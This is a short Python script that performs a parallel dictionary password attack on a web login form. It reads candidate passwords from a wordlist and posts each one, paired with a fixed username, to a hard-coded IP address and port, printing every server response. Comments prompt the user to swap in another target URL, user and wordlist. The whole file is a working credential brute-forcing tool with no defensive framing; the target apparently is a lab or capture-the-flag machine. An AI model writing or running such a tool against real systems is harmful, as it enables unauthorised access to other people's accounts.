from multiprocessing import Pool
import requests

URL = "http://188.245.212.74:10037/login"
#change URL

USER = "KevinM"
#change USER
  
DICT = "./dict2.txt"
#change DICT to dictionaryfile

def func1(line):

            password = line.strip()

            data ={"username":USER,"password":password}

            response = requests.post(URL,data=data)

            print(response.text + ":" + password)
def main():
    with open(DICT) as f:
        line = f.readlines()
        #print(line)
        
        
    with Pool() as p:
        p.map(func1, line)

if __name__ == "__main__":
    main()
